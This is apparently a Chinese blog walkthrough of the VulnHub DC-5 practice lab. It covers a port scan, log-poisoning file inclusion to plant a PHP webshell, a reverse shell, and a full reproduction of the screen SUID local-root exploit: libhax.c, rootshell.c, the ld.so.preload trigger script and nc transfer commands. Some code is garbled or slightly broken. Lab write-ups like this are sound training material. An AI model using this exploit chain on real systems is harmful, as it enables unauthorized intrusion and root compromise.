vuluhub dc-5靶场

kali机ip:172.23.56.81 靶机ip:172.23.56.82

靶机mac地址

发现靶机ip

nmap -A -p- -v 加IP地址

扫描到以下端口

发现get传参,和文件包含

打开burpsuit抓包,下载火狐代理,抓包地址为kali ip

抓包发现密码

发现日志文件

发现错误文件包含

发现php页面

一句话病毒

利用中国蚁剑连接一句话木马

http://172.23.56.81/thankyou.php?file=/var/log/nginx/access.log powershell

点击添加数据

新建一个文件,写入一句话木马

发现可以访问

进行反弹shell连接,链接到靶机

需要借助到蚁剑的虚拟目录,只要蚁剑停止,就在kali上输入这条命令

python -c "import pty;pty.spawn('/bin/bash')"

发现反弹shell连接成功

发现存在screen脚本

find / -user root -perm -4000 -print 2>/dev/null 
find / -perm -u=s -type f 2>/dev/null

搜索脚本,用第一个

cp /usr/share/exploitdb/exploits/linux/local/41154.sh ./41154.sh

将脚本复制到本地

查看脚本

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

将上面代码新建一个目录,在里面新建文件夹libhax.c

mkdir dc-5新建目录 touch linhax.c 新建文件夹 vim libhax.c编辑文件夹,:wq!保存退出

​
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c

​

gcc 编译脚本生成libhax.c 再删除以前的脚本


#include <sys/stat.h>
Rootshell.c
#include <stdio.h> #include <unistd.h> int main() { // 设置用户和组相关权限操作 setuid(0); setgid(0); seteuid(0); setegid(0); // 准备执行 /bin/sh 的参数数组 char *argv[] = {"/bin/sh", NULL}; // 执行 /bin/sh execvp("/bin/sh", argv); return 0; }

如果上面那个代码报错,可以使用这个

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c

touch rootshell.c 步骤同上

#!/bin/bash
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell 
:set ff=unix

新建dc5.sh文件

之后进行删除,因为上面的文件是在kali上的,需要把这些文件上传

kali攻击机使用命令:nc -nlvp 4567 < libhax.so

靶场使用命令:nc  +IP 4567 > libhax.so,连接之后kali断开即可,就是蚁剑的虚拟终端

首先输入命令:cd /etc

然后输入命令:umask 000

然后输入命令:screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"

然后输入命令:screen -ls

因为脚本自带教程,直接跟着走

进行提权

成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值